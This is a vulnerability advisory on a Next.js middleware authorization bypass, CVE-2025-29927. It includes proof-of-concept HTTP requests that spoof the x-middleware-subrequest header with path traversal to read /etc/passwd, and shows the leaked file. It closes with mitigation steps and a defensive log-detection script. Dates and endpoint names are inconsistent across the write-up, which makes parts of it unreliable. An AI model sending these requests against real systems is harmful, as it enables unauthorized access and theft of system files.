CVE-2025-29927
May 20, 2025
Overview
CVE ID: CVE-2025-29927
Severity: Critical
CVSS Score: 9.1
Status: Patched
CVE-2025-29927 — Next.js Middleware Authorization Bypass
Summary
A critical authorization bypass vulnerability in Next.js (a popular React framework) that affects versions:
- 1.11.4 up to but not including:
  - 12.3.5
  - 13.5.9
  - 14.2.25
  - 15.2.3
Applications using middleware for authentication or authorization are particularly at risk.
Root Cause
- The vulnerability is due to trusting the x-middleware-subrequest header, which Next.js uses internally to mark its own subrequests.
- Attackers can spoof this header in HTTP requests.
- Next.js then skips middleware execution (auth, access control, etc.), resulting in unauthorized access.
Exploitation
Add this header to a request:
X-Middleware-Subrequest: middleware:middleware:middleware
Proof of Concept
Request 1 (Without Bypass):
GET /api/getfiles?fileNAME=../../../../etc/passwd HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 0
Response 1 (Redirected to Auth):
HTTP/1.1 307 Temporary Redirect
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 02 Sep 2025 11:13:59 GMT
Connection: keep-alive
Location: /api/auth/signin?callbackUrl=%2Fapi%2Fdownload%3FfileNAME%3D..%252F..%252F..%252F..%252Fetc%252Fpasswd
Content-Length: 101
Request 2 (With Bypass):
GET /api/getfile?fileNAME=../../../../etc/passwd HTTP/1.1
Host: 192.168.0.1
X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 0
Response 2 (Successful Bypass):
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 02 Sep 2025 11:15:54 GMT
Content-Type: application/zip
Content-Length: 787
Connection: keep-alive
Content-Disposition: attachment; filename=../../../../etc/passwd
ETag: "41amqg1v4m26j"
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
roger:x:0:0:root:/home/roger:/bin/sh
Affected Systems
- Next.js versions 1.11.4 up to but not including:
  - 12.3.5
  - 13.5.9
  - 14.2.25
  - 15.2.3
- Applications using Next.js middleware for authentication or authorization
- Web applications built with the Next.js framework
Impact Assessment
- Critical severity with CVSS score of 9.1
- Complete authorization bypass for protected routes
- Unauthorized access to sensitive endpoints
- Potential data exfiltration and system compromise
- Bypass of security controls implemented in middleware
Mitigation Strategies
- Immediate Action: Update to the latest patched versions
- Version Updates:
  - Update to 12.3.5 or later (for v12)
  - Update to 13.5.9 or later (for v13)
  - Update to 14.2.25 or later (for v14)
  - Update to 15.2.3 or later (for v15)
- Security Review: Audit middleware implementations
- Monitoring: Implement additional security controls
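As an added example for the monitoring and hardening items above (not code from this advisory or from the Next.js project): a small Node.js script that flags proxy log entries carrying the x-middleware-subrequest header, and a helper that drops the header from external requests, the interim workaround upstream recommended for deployments that cannot patch immediately. The JSON-lines log format, its field names and the sample entries are assumptions constructed for this example.

```javascript
// Added example, not code from the advisory or from Next.js.
// Assumes a constructed JSON-lines proxy log with fields client_ip, path, headers.
const BYPASS_HEADER = "x-middleware-subrequest";

// Normalise header names so matching is case-insensitive (HTTP header names are).
function lowercaseKeys(obj) {
  return Object.fromEntries(
    Object.entries(obj).map(([k, v]) => [k.toLowerCase(), v])
  );
}

// Scan proxy log lines and return one finding per request that carried the
// header. Next.js sets x-middleware-subrequest only on its own internal
// subrequests, so any copy arriving from a client is a bypass attempt.
function detectBypassAttempts(logLines) {
  const findings = [];
  for (const line of logLines) {
    let entry;
    try { entry = JSON.parse(line); } catch { continue; } // skip malformed lines
    if (!entry || typeof entry !== "object") continue;
    const headers = lowercaseKeys(entry.headers || {});
    const value = headers[BYPASS_HEADER];
    if (value === undefined) continue;
    findings.push({
      ip: entry.client_ip,
      path: entry.path,
      headerValue: value,
      // Number of colon-separated tokens; the PoC above repeats "middleware".
      segmentCount: value.split(":").filter(Boolean).length,
    });
  }
  return findings;
}

// Interim edge-side hardening for deployments that cannot patch at once:
// drop the header from external requests before they reach Next.js.
function stripBypassHeader(headers) {
  return Object.fromEntries(
    Object.entries(headers).filter(([k]) => k.toLowerCase() !== BYPASS_HEADER)
  );
}

// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  '{"client_ip":"203.0.113.10","path":"/api/getfile?fileNAME=report.pdf","headers":{"User-Agent":"Mozilla/5.0"}}',
  '{"client_ip":"203.0.113.77","path":"/api/getfile?fileNAME=../../../../etc/passwd","headers":{"X-Middleware-Subrequest":"middleware:middleware:middleware:middleware:middleware"}}',
  "not json",
];
console.log(detectBypassAttempts(SAMPLE_LOG));
```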
Timeline
- Discovery: Early 2025
- Disclosure: May 2025
- Patches Released: May 2025
- Status: Patched in latest versions